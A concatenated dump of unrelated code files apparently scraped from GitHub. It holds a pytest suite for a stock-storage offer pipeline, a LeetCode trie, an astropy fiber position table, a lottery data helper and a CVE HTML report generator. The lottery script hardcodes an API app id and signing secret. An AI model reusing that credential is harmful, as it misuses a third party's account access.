self.HEIGHT))\n","repo_name":"SamoKopecky/GameOfLife-python","sub_path":"MainGui.py","file_name":"MainGui.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"444610399","text":"# coding: utf-8\n\nfrom hamcrest import assert_that\nimport pytest\nfrom datetime import datetime\n\nfrom market.idx.datacamp.proto.offer.DataCampOffer_pb2 import (\n OfferStatus,\n OfferIdentifiers,\n OfferMeta,\n OfferOrderProperties,\n UpdateMeta,\n Flag,\n MARKET_STOCK,\n MARKET_IDX,\n MARKET_ABO,\n BLUE,\n)\nfrom market.idx.datacamp.proto.offer.DataCampOffer_pb2 import Offer as DatacampOffer\nfrom market.idx.datacamp.proto.api.SyncChangeOffer_pb2 import ChangeOfferRequest\nfrom market.idx.datacamp.controllers.piper.yatf.test_env_old import PiperTestEnv\nfrom market.idx.datacamp.controllers.piper.yatf.resources.config_mock import PiperConfigMock\n\nfrom market.idx.yatf.resources.lbk_topic import LbkTopic\nfrom market.idx.yatf.resources.datacamp.datacamp_tables import DataCampServiceOffersTable, DataCampPartnersTable\n\nfrom market.idx.yatf.matchers.yt_rows_matchers import HasOffers\n\nfrom market.pylibrary.proto_utils import message_from_data\nfrom market.idx.datacamp.yatf.utils import create_meta, dict2tskv\nfrom market.idx.pylibrary.datacamp.utils import wait_until\nfrom market.idx.pylibrary.datacamp.conversion import offer_to_service_row\n\nBUSINESS_ID = 1000\nSHOP_ID = 1\nWAREHOUSE_ID = 111\nFEED_ID = 111000\nCREATE_TS = 10\nCURRENT_TS = 500\nFUTURE_TS = 1000\nSS_TS = 700\ntime_pattern = \"%Y-%m-%dT%H:%M:%SZ\"\n\n\n@pytest.fixture(scope='module')\ndef partners_table(yt_server, config):\n SHOPS = [\n {\n 'shop_id': SHOP_ID,\n 'mbi': '\\n\\n'.join([\n dict2tskv({\n 'shop_id': SHOP_ID,\n 'warehouse_id': WAREHOUSE_ID,\n 'datafeed_id': FEED_ID,\n 'business_id': BUSINESS_ID\n }),\n ]),\n 'status': 'publish'\n }\n ]\n\n return DataCampPartnersTable(\n yt_server,\n config.yt_partners_tablepath,\n data=SHOPS\n )\n\n\n@pytest.fixture(scope='module')\ndef actual_service_offers_table(yt_server, config):\n def create_update_meta(source, ts_seconds):\n meta = UpdateMeta()\n meta.source = source\n meta.timestamp.FromSeconds(ts_seconds)\n\n return meta\n\n def create_status(disabled_list):\n status = []\n for disabled in disabled_list:\n status.append(Flag(\n flag=disabled[0],\n meta=create_update_meta(disabled[1], disabled[2])\n ))\n return OfferStatus(disabled=status)\n\n def create_order_properties(order_method, source, ts_seconds):\n return OfferOrderProperties(\n order_method=order_method,\n meta=create_update_meta(source, ts_seconds)\n )\n\n offer_meta = create_meta(CREATE_TS, BLUE)\n\n return DataCampServiceOffersTable(yt_server, config.yt_actual_service_offers_tablepath, data=[\n offer_to_service_row(\n DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.to.be.enabled',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.to.be.disabled',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.to.be.enabled.and.preorder',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.disabled.in.table.by.other.source.to.be.disabled.by.stock',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta,\n status=create_status([(True, MARKET_ABO, CURRENT_TS)])\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.enabled.in.table.to.be.disabled.and.preorder',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta,\n status=create_status([(False, MARKET_STOCK, CURRENT_TS)]),\n order_properties=create_order_properties(\n OfferOrderProperties.AVAILABLE_FOR_ORDER,\n MARKET_STOCK,\n CURRENT_TS,\n )\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.disabled.in.table.to.be.enabled.and.preorder',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta,\n status=create_status([(True, MARKET_STOCK, CURRENT_TS)]),\n order_properties=create_order_properties(\n OfferOrderProperties.AVAILABLE_FOR_ORDER,\n MARKET_STOCK,\n CURRENT_TS,\n )\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.enabled.in.table.not.to.be.disabled.with.older.ts.and.preorder',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta,\n status=create_status([(False, MARKET_STOCK, FUTURE_TS)]),\n order_properties=create_order_properties(\n OfferOrderProperties.AVAILABLE_FOR_ORDER,\n MARKET_STOCK,\n CURRENT_TS,\n )\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.enabled.in.table.not.to.be.disabled.with.older.ts.and.preorder',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta,\n status=create_status([(False, MARKET_STOCK, FUTURE_TS)]),\n order_properties=create_order_properties(\n OfferOrderProperties.AVAILABLE_FOR_ORDER,\n MARKET_STOCK,\n CURRENT_TS,\n )\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.disabled.in.table.not.to.be.enabled.and.preorder.with.older.ts',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta,\n status=create_status([(True, MARKET_STOCK, CURRENT_TS)]),\n order_properties=create_order_properties(\n OfferOrderProperties.AVAILABLE_FOR_ORDER,\n MARKET_STOCK,\n FUTURE_TS,\n )\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.with.stock.count',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta,\n )),\n ])\n\n\n@pytest.fixture(scope='module')\ndef ss_topic_data():\n def make_ss_data(shop_id, offer_id, disabled, preorder, ts, available=None):\n # NB: Stock storage шлет метку времени в legacy формате (ts_ms)\n meta = UpdateMeta(\n source=MARKET_STOCK,\n ts_ms=ts * 1000\n )\n\n offer = DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=shop_id,\n offer_id=offer_id,\n warehouse_id=WAREHOUSE_ID,\n feed_id=FEED_ID,\n ),\n meta=OfferMeta(\n rgb=BLUE\n ),\n )\n\n if disabled is not None:\n flag = offer.status.disabled.add()\n flag.flag = disabled\n flag.meta.CopyFrom(meta)\n\n if preorder is not None:\n order_method = OfferOrderProperties.PRE_ORDERED if preorder else OfferOrderProperties.AVAILABLE_FOR_ORDER\n offer.order_properties.order_method = order_method\n offer.order_properties.meta.CopyFrom(meta)\n\n if available is not None:\n offer.stock_info.market_stocks.count = available\n offer.stock_info.market_stocks.meta.CopyFrom(meta)\n\n return offer\n\n return [\n # Оффер выключается по стокам, проставляются параметры заказа\n make_ss_data(\n shop_id=SHOP_ID,\n offer_id='ssku.to.be.disabled',\n disabled=True,\n preorder=False,\n ts=SS_TS,\n ),\n # Оффер включается по стокам, проставляются параметры заказа\n make_ss_data(\n shop_id=SHOP_ID,\n offer_id='ssku.to.be.enabled',\n disabled=False,\n preorder=False,\n ts=SS_TS,\n ),\n # Оффер включается по стокам, проставляются параметры предзаказа\n make_ss_data(\n shop_id=SHOP_ID,\n offer_id='ssku.to.be.enabled.and.preorder',\n disabled=False,\n preorder=True,\n ts=SS_TS,\n ),\n # Не существующий в таблице оффер включается по стокам, проставляются параметры предзаказа (добавляется в\n # таблицу с установленным скрытием MARKET_IDX, т.к. не готов к индексации)\n make_ss_data(\n shop_id=SHOP_ID,\n offer_id='ssku.to.be.enabled.but.absent.in.storage',\n disabled=False,\n preorder=False,\n ts=SS_TS,\n ),\n # Оффер выключается по стокам, скрытия из других источников сохраняются\n make_ss_data(\n shop_id=SHOP_ID,\n offer_id='ssku.disabled.in.table.by.other.source.to.be.disabled.by.stock',\n disabled=True,\n preorder=False,\n ts=SS_TS,\n ),\n # Оффер, включенный по стокам, должен быть выключен\n make_ss_data(\n shop_id=SHOP_ID,\n offer_id='ssku.enabled.in.table.to.be.disabled.and.preorder',\n disabled=True,\n preorder=True,\n ts=SS_TS,\n ),\n # Оффер, выключенный по стокам, должен быть включен\n make_ss_data(\n shop_id=SHOP_ID,\n offer_id='ssku.disabled.in.table.to.be.enabled.and.preorder',\n disabled=False,\n preorder=True,\n ts=SS_TS,\n ),\n # Оффер, включенный по стокам, не выключается, если метка времени старая\n make_ss_data(\n shop_id=SHOP_ID,\n offer_id='ssku.enabled.in.table.not.to.be.disabled.with.older.ts.and.preorder',\n disabled=True,\n preorder=True,\n ts=SS_TS,\n ),\n # Оффер, выключенный по стокам, включается, но предзаказ не меняется, т.к. метка времени старая\n make_ss_data(\n shop_id=SHOP_ID,\n offer_id='ssku.disabled.in.table.not.to.be.enabled.and.preorder.with.older.ts',\n disabled=False,\n preorder=False,\n ts=SS_TS,\n ),\n # Оффер с информаций о количестве товара на складе\n make_ss_data(\n shop_id=SHOP_ID,\n offer_id='ssku.with.stock.count',\n disabled=None,\n preorder=None,\n ts=SS_TS,\n available=5,\n ),\n ]\n\n\n@pytest.fixture(scope='session')\ndef stock_storage_topic(log_broker_stuff):\n topic = LbkTopic(log_broker_stuff)\n return topic\n\n\n@pytest.fixture(scope='session')\ndef config(yt_server, log_broker_stuff, stock_storage_topic):\n cfg = {\n 'general': {\n 'color': 'blue',\n },\n 'logbroker': {\n 'stock_storage_topic': stock_storage_topic.topic,\n },\n }\n return PiperConfigMock(\n yt_server=yt_server,\n log_broker_stuff=log_broker_stuff,\n config=cfg\n )\n\n\n@pytest.yield_fixture(scope='module')\ndef piper(yt_server, log_broker_stuff, config, stock_storage_topic, actual_service_offers_table, partners_table):\n resources = {\n 'config': config,\n 'actual_service_offers_table': actual_service_offers_table,\n 'partners_table': partners_table,\n 'stock_storage_topic': stock_storage_topic,\n }\n with PiperTestEnv(yt_server, log_broker_stuff, **resources) as piper_env:\n piper_env.verify()\n yield piper_env\n\n\n@pytest.yield_fixture(scope='module')\ndef workflow(piper, stock_storage_topic, ss_topic_data):\n for ss in ss_topic_data:\n request = ChangeOfferRequest()\n request.offer.extend([ss])\n stock_storage_topic.write(request.SerializeToString())\n\n wait_until(lambda: piper.united_offers_processed >= len(ss_topic_data), timeout=60)\n wait_until(lambda: piper.stock_storage_processed >= len(ss_topic_data), timeout=60)\n\n\ndef make_expected_dict(ssku, business_id, disabled_list, preorder, available=None, shop_id=None, warehouse_id=None):\n result = {\n 'identifiers': {\n 'business_id': business_id,\n 'offer_id': ssku,\n }\n }\n if shop_id is not None:\n result['identifiers']['shop_id'] = shop_id\n if warehouse_id is not None:\n result['identifiers']['warehouse_id'] = warehouse_id\n\n if disabled_list is not None:\n result['status'] = {\n 'disabled': [\n {\n 'flag': disabled[0],\n 'meta': {\n 'source': disabled[1],\n 'timestamp': datetime.utcfromtimestamp(disabled[2]).strftime(time_pattern)\n }\n } for disabled in disabled_list\n ]\n }\n\n if preorder is not None:\n result['order_properties'] = {\n 'meta': {\n 'source': MARKET_STOCK,\n 'timestamp': datetime.utcfromtimestamp(preorder[1]).strftime(time_pattern)\n },\n 'order_method': OfferOrderProperties.PRE_ORDERED if preorder[0]\n else OfferOrderProperties.AVAILABLE_FOR_ORDER\n }\n\n if available is not None:\n result['stock_info'] = {\n 'market_stocks': {\n 'meta': {\n 'source': MARKET_STOCK,\n 'timestamp': datetime.utcfromtimestamp(available[1]).strftime(time_pattern)\n },\n 'count': available[0]\n }\n }\n\n return result\n\n\n@pytest.mark.parametrize(\"expected\", [\n make_expected_dict(\n ssku='ssku.to.be.disabled',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=[(True, MARKET_STOCK, SS_TS)],\n preorder=(False, SS_TS),\n ),\n make_expected_dict(\n ssku='ssku.to.be.enabled',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=[(False, MARKET_STOCK, SS_TS)],\n preorder=(False, SS_TS),\n ),\n make_expected_dict(\n ssku='ssku.to.be.enabled.and.preorder',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=[(False, MARKET_STOCK, SS_TS)],\n preorder=(True, SS_TS),\n ),\n make_expected_dict(\n ssku='ssku.disabled.in.table.by.other.source.to.be.disabled.by.stock',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=[(True, MARKET_STOCK, SS_TS), (True, MARKET_ABO, CURRENT_TS)],\n preorder=(False, SS_TS),\n ),\n make_expected_dict(\n ssku='ssku.enabled.in.table.to.be.disabled.and.preorder',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=[(True, MARKET_STOCK, SS_TS)],\n preorder=(True, SS_TS),\n ),\n make_expected_dict(\n ssku='ssku.disabled.in.table.to.be.enabled.and.preorder',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=[(False, MARKET_STOCK, SS_TS)],\n preorder=(True, SS_TS),\n ),\n make_expected_dict(\n ssku='ssku.enabled.in.table.not.to.be.disabled.with.older.ts.and.preorder',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=[(False, MARKET_STOCK, FUTURE_TS)],\n preorder=(True, SS_TS),\n ),\n make_expected_dict(\n ssku='ssku.disabled.in.table.not.to.be.enabled.and.preorder.with.older.ts',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=[(False, MARKET_STOCK, SS_TS)],\n preorder=(False, FUTURE_TS),\n ),\n make_expected_dict(\n ssku='ssku.to.be.enabled.but.absent.in.storage',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=[(False, MARKET_STOCK, SS_TS), (True, MARKET_IDX, SS_TS)],\n preorder=(False, SS_TS),\n ),\n make_expected_dict(\n ssku='ssku.with.stock.count',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=None,\n preorder=None,\n available=(5, SS_TS),\n ),\n])\ndef test_stock_storage_update_offer(workflow, piper, expected):\n \"\"\"\n Проверяем, что piper читает стоки из топика и корректно обновляет/создает офферы\n \"\"\"\n assert_that(piper.actual_service_offers_table.data, HasOffers([message_from_data(expected, DatacampOffer())]))\n\n\n@pytest.mark.parametrize(\"expected\", [\n make_expected_dict(\n ssku='ssku.to.be.disabled',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=[(True, MARKET_STOCK, SS_TS)],\n preorder=(False, SS_TS),\n ),\n make_expected_dict(\n ssku='ssku.with.stock.count',\n business_id=BUSINESS_ID,\n shop_id=SHOP_ID,\n warehouse_id=WAREHOUSE_ID,\n disabled_list=None,\n preorder=None,\n available=(5, SS_TS),\n ),\n])\ndef test_stock_storage_create_united_offer(workflow, piper, expected):\n \"\"\"\n Проверяем, что piper:\n - создает офферы со скрытием и предзаказом в ActualServiceOffers\n - создает пустой оффер в BasicOffers\n - создает офферы в ServiceOffers\n \"\"\"\n assert_that(piper.service_offers_table.data, HasOffers([message_from_data({\n 'identifiers': {\n 'business_id': BUSINESS_ID,\n 'shop_id': SHOP_ID,\n 'offer_id': expected['identifiers']['offer_id'],\n }\n }, DatacampOffer())]))\n assert_that(piper.actual_service_offers_table.data, HasOffers([message_from_data(\n expected, DatacampOffer())]))\n assert_that(piper.basic_offers_table.data, HasOffers([message_from_data({\n 'identifiers': {\n 'business_id': BUSINESS_ID,\n 'offer_id': expected['identifiers']['offer_id'],\n },\n 'status': {\n 'disabled': [],\n },\n }, DatacampOffer())]))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/tests/test_stock_storage.py","file_name":"test_stock_storage.py","file_ext":"py","file_size_in_byte":20095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8551509126","text":"# https://leetcode.com/problems/design-add-and-search-words-data-structure/\n\nclass TrieNode:\n def __init__(self):\n self.children = {}\n self.end = False\nclass WordDictionary:\n def __init__(self):\n self.root = TrieNode()\n\n def addWord(self, word: str) -> None:\n curr = self.root\n\n for c in word:\n if c not in curr.children:\n curr.children[c] = TrieNode()\n\n curr = curr.children[c]\n\n curr.end = True\n\n def search(self, word: str) -> bool:\n def dfs(root, word):\n curr = root\n\n for i, c in enumerate(word):\n if c == '.':\n for child in curr.children.values():\n if dfs(child, word[i + 1:]): # dfs(child, word[1:]) is wrong because c will update during the for loop,\n return True # whereas word remained the same.\n return False\n else:\n if c not in curr.children:\n return False\n\n curr = curr.children[c]\n\n return curr.end\n\n return dfs(self.root, word)\n\n\n\n\n\n\n\n\n\n\n\n\n\n# Your WordDictionary object will be instantiated and called as such:\n# obj = WordDictionary()\n# obj.addWord(word)\n# param_2 = obj.search(word)","repo_name":"jeffreytigerwang/Python-Practice","sub_path":"medium/Design Add and Search Words Data Structure.py","file_name":"Design Add and Search Words Data Structure.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41981599977","text":"import numpy\nfrom astropy.io import fits as pyfits\n\n\nclass PositionTable(object):\n def __init__(\n self,\n shape=None,\n size=None,\n arc_position_x=None,\n arc_position_y=None,\n good_fibers=None,\n fiber_type=None,\n ):\n if shape is None:\n self._shape = None\n else:\n self._shape = shape\n\n if size is None:\n self._size = None\n else:\n self._size = size\n\n if arc_position_x is None:\n self._arc_position_x = None\n else:\n self._arc_position_x = numpy.array(arc_position_x)\n\n if arc_position_y is None:\n self._arc_position_y = None\n else:\n self._arc_position_y = numpy.array(arc_position_y)\n\n if good_fibers is None:\n self._good_fibers = None\n else:\n self._good_fibers = numpy.array(good_fibers)\n\n try:\n self._fiber_type = numpy.array(fiber_type)\n except:\n self._fiber_type = None\n\n def loadTxtPosTab(self, file):\n dat = open(file, \"r\")\n lines = dat.readlines()\n dat.close()\n line = lines[0].split()\n self._shape = line[0]\n self._size = (float(line[1]), float(line[2]))\n fibers = len(lines) - 1\n pos_x = numpy.zeros(fibers, dtype=numpy.float32)\n pos_y = numpy.zeros(fibers, dtype=numpy.float32)\n good = numpy.zeros(fibers, dtype=numpy.uint8)\n if len(lines[1].split()) > 4:\n fiber_type = numpy.empty(fibers, dtype=\"|S3\")\n for i in range(1, fibers + 1):\n line = lines[i].split()\n pos_x[i - 1] = float(line[1])\n pos_y[i - 1] = float(line[2])\n good[i - 1] = int(line[3])\n if len(line) > 4:\n fiber_type[i - 1] = line[4]\n self._arc_position_x = pos_x\n self._arc_position_y = pos_y\n self._good_fibers = good\n if len(line) > 4:\n self._fiber_type = fiber_type\n\n def writeTxtPosTab(self, file, fiber_type=False):\n dat = open(file, \"w\")\n print >> dat, \"%s %.2f %.2f %i\" % (self._shape, self._size[0], self._size[1], 0)\n for i in range(len(self._arc_position_x)):\n if fiber_type:\n print >> dat, \"%i %.2f %.2f %i %s\" % (\n i + 1,\n self._arc_position_x[i],\n self._arc_position_y[i],\n self._good_fibers[i],\n self._fiber_type[i],\n )\n else:\n print >> dat, \"%i %.2f %.2f %i\" % (\n i + 1,\n self._arc_position_x[i],\n self._arc_position_y[i],\n self._good_fibers[i],\n )\n # print >> dat, \"%i %.2f %.2f %i\"%(i+1, self._arc_position_x[i], self._arc_position_y[i], self._good_fibers[i])\n # print >> dat, \"%i %.2f %.2f\"%(i+1, self._arc_position_x[i], self._arc_position_y[i])\n dat.close()\n\n def writeFitsPosTable(self):\n columns = []\n columns.append(\n pyfits.Column(\n name=\"X_Position\",\n unit=\"arcsec\",\n format=\"E\",\n array=self._arc_position_x.astype(\"float32\"),\n )\n )\n columns.append(\n pyfits.Column(\n name=\"Y_Position\",\n unit=\"arcsec\",\n format=\"E\",\n array=self._arc_position_y.astype(\"float32\"),\n )\n )\n columns.append(\n pyfits.Column(\n name=\"GoodFiber\", unit=\"flag\", format=\"I\", array=self._good_fibers\n )\n )\n columns.append(\n pyfits.Column(name=\"FiberType\", format=\"3A\", array=self._fiber_type)\n )\n try:\n table = pyfits.new_table(columns)\n except AttributeError:\n table = pyfits.BinTableHDU.from_columns(columns)\n try:\n table.header.update(\n \"FibShape\", self._shape, \"Shape of the fiber (C-Circular, S-Square)\"\n )\n table.header.update(\n \"FibSizeX\", self._size[0], \"Size of the fiber in x-direction\"\n )\n table.header.update(\n \"FibSizeY\", self._size[1], \"Size of the fiber in y-direction\"\n )\n except ValueError:\n table.header[\"FibShape\"] = (\n self._shape,\n \"Shape of the fiber (C-Circular, S-Square)\",\n )\n table.header[\"FibSizeX\"] = (\n self._size[0],\n \"Size of the fiber in x-direction\",\n )\n table.header[\"FibSizeY\"] = (\n self._size[1],\n \"Size of the fiber in y-direction\",\n )\n return table\n\n def loadFitsPosTable(self, table):\n data = table.data\n header = table.header\n self._arc_position_x = data.field(\"X_Position\")\n self._arc_position_y = data.field(\"Y_Position\")\n self._good_fibers = data.field(\"GoodFiber\")\n self._fiber_type = data.field(\"FiberType\")\n self._shape = header[\"FibShape\"]\n self._size = (header[\"FibSizeX\"], header[\"FibSizeY\"])\n\n def append(self, pos_tab):\n self._pos_x = numpy.concatenate((self._pos_x, pos_tab._pos_x))\n self._pos_y = numpy.concatenate((self._pos_y, pos_tab._pos_y))\n self._good = numpy.concatenate((self._good, pos_tab._good))\n if self._types is not None and pos_tab._types is not None:\n self._types = numpy.concatenate((self._types, pos_tab._types))\n\n def offsetPosTab(self, offset_x, offset_y):\n self._arc_position_x = self._arc_position_x + offset_x\n self._arc_position_y = self._arc_position_y + offset_y\n\n def rotatePosTab(self, angle, ref_cent_x=0.0, ref_cent_y=0.0):\n # print angle\n # print self._arc_position_x, self._arc_position_y\n\n arc_position_x = (self._arc_position_x - ref_cent_x) * numpy.cos(\n float(angle) / 180.0 * numpy.pi\n ) - (self._arc_position_y - ref_cent_y) * numpy.sin(\n float(angle) / 180.0 * numpy.pi\n )\n arc_position_y = (self._arc_position_x - ref_cent_x) * numpy.sin(\n float(angle) / 180.0 * numpy.pi\n ) + (self._arc_position_y - ref_cent_y) * numpy.cos(\n float(angle) / 180.0 * numpy.pi\n )\n posTab_new = PositionTable(\n shape=self._shape,\n size=self._size,\n arc_position_x=arc_position_x,\n arc_position_y=arc_position_y,\n good_fibers=self._good_fibers,\n fiber_type=self._fiber_type,\n )\n return posTab_new\n\n def scalePosTab(self, scale):\n position_x = self._arc_position_x * scale\n position_y = self._arc_position_y * scale\n size = [self._size[0] * scale, self._size[1] * scale]\n posTab_new = PositionTable(\n shape=self._shape,\n size=size,\n arc_position_x=position_x,\n arc_position_y=position_y,\n good_fibers=self._good_fibers,\n fiber_type=self._fiber_type,\n )\n return posTab_new\n\n def distance(self, x_ref, y_ref):\n distance = numpy.sqrt(\n (x_ref - self._arc_position_x) ** 2 + (y_ref - self._arc_position_y) ** 2\n )\n return distance\n\n def setPosTab(self, PosTab):\n self._arc_position_x = PosTab._arc_position_x\n self._arc_position_y = PosTab._arc_position_y\n self._good_fibers = PosTab._good_fibers\n self._fiber_type = PosTab._fiber_type\n self._shape = PosTab._shape\n self._size = PosTab._size\n\n\ndef loadPosTable(infile):\n posTab = PositionTable()\n if \".txt\" in infile:\n posTab.loadTxtPosTab(infile)\n elif \".fits\" in infile or \".fit\" in infile:\n hdu = pyfits.open(infile, memmap=False)\n found = False\n for i in range(1, len(hdu)):\n if hdu[i].header[\"EXTNAME\"].split()[0] == \"POSTABLE\":\n posTab.loadFitsPosTable(hdu[i])\n found = True\n if found == False:\n raise RuntimeError(\n \"No position table information found in file %s.\" % (infile)\n )\n return posTab\n","repo_name":"sdss/lvmdrp","sub_path":"python/lvmdrp/core/positionTable.py","file_name":"positionTable.py","file_ext":"py","file_size_in_byte":8306,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38158827350","text":"# from urllib import request, parse\nimport json\nimport numpy as np\n\n_showapi_appid = '43943'\n_showapi_sign = 'cb8ab2087d7a42e7b2e1a9470659bc42'\n\nurl = 'http://route.showapi.com/44-2'\n\n\ndef randomOpenCode(num):\n training_set = []\n for i in range(num):\n code = np.random.choice(32, 5, replace=False)\n code = np.append(code, np.random.choice(32, 1, replace=False))\n training_set.append(code)\n\n return np.array(training_set)\n\ndef convertDataToY(lists):\n res = []\n for now in lists:\n tmp = np.zeros(32)\n for i in now:\n tmp[i] = 1\n res.append(tmp)\n return np.array(res)\n\ndef convertYToData(lists):\n res = []\n for now in lists:\n sort = now.copy()\n print('sort:', sort)\n tmp = []\n tmp = np.argpartition(sort, 6)\n print('tmp:', tmp)\n # for i in now:\n # if(i )\n\nlist = randomOpenCode(2)\nprint('list:', list)\nafter = convertDataToY(list)\nprint('after:', after)\nback = convertYToData(after)\nprint('back:', back)\n\n# def getData():\n# send_data = parse.urlencode([\n# ('showapi_appid', _showapi_appid),\n# ('showapi_sign', _showapi_sign),\n# (\"code\", \"ssq\"),\n# (\"count\", 50)\n#\n# ])\n#\n# req = request.Request(url)\n# try:\n# response = request.urlopen(req, data=send_data.encode('utf-8'), timeout=10)\n# except Exception as e:\n# print(e)\n#\n# result = response.read().decode('utf-8')\n# result_json = json.loads(result)\n# print('result_json data is:', result_json)\n#\n# results = result_json['showapi_res_body']['result']\n#\n# train_examples = []\n# for res in results:\n# tmp = str.split(res['openCode'], ',')\n# last_index = len(tmp) - 1\n#\n# print('tmp', tmp, 'len[tmp] - 1', last_index)\n# last_codes = str.split(tmp[last_index], '+')\n# tmp[last_index] = last_codes[0]\n# tmp.append(last_codes[1])\n# train_examples.append(np.array(tmp).astype(int))\n#\n# print('result_json data is:', len(results))\n# print('train_examples is:', train_examples)\n#\n# return np.array(train_examples)\n\n","repo_name":"ZQPlantSoftware/quantiative-trading","sub_path":"strategy/cnn-predict-lottery/data_helper.py","file_name":"data_helper.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"72"} +{"seq_id":"33074539138","text":"import os\nfrom cveClass import *\nfrom cpeClass import *\n\n\ndef createFile(path):\n if not os.path.exists(path):\n with open(path, 'w') as f:\n f.write('''\n\n\n \n \n KcVE\n\n \n\n\n
\n
\n\n

Cve Report

\n
''')\n f.close()\n\n\ndef appendToFile(path, text):\n file = open(path, 'a') # Open a file in append mode\n file.write(text) # Write some text\n file.close() # Close the file\n\n\ndef createCveReport(cveList, path):\n createFile(path)\n for i in range(len(cveList)):\n\n # show cve id and cvss infos\n cveReport = '

' + str(cveList[i].id) + '         CVSS version' + str(\n cveList[i].version) + '

'\n cveReport += '

Published Date: ' + cveList[i].publishedDate + '
lastModifiedDate: ' + cveList[\n i].lastModifiedDate + '

'\n cveReport += '

Description

' + cveList[i].description + '

'\n cveReport += '

CVSS

Base Score: ' + str(cveList[i].baseScore) + '
Vector String: ' + cveList[\n i].vectorString + '
Exploitability Score: ' + str(cveList[i].exploitabilityScore) + '

'\n\n # show all cpes for a cve object\n cveReport += '

Vulnerable CPEs

'\n for j in range(len(cveList[i].cpeList)):\n cveReport += '
    '\n cveReport += '
  • vendor:' + cveList[i].cpeList[j].vendor + ' product: ' + \\\n cveList[i].cpeList[j].product + ' version: ' + cveList[i].cpeList[j].version + '
  • '\n\n if cveList[i].cpeList[j].minVersion is not None and cveList[i].cpeList[j].maxVersion is not None:\n cveReport += '
  • minVersion:' + cveList[i].cpeList[\n j].minVersion + ' maxVersion:' + \\\n cveList[i].cpeList[j].maxVersion + '
  • '\n if cveList[i].cpeList[j].minVersion is not None:\n cveReport += '
  • minVersion:' + cveList[i].cpeList[j].minVersion + '
  • '\n if cveList[i].cpeList[j].maxVersion is not None:\n cveReport += '
  • maxVersion:' + cveList[i].cpeList[j].maxVersion + '
  • '\n cveReport += '
'\n\n # show the source and url reference\n cveReport += '

Source

' + cveList[i].source + '

'\n cveReport += '

URL Reference

' + cveList[i].urlSource + '

'\n\n cveReport += '
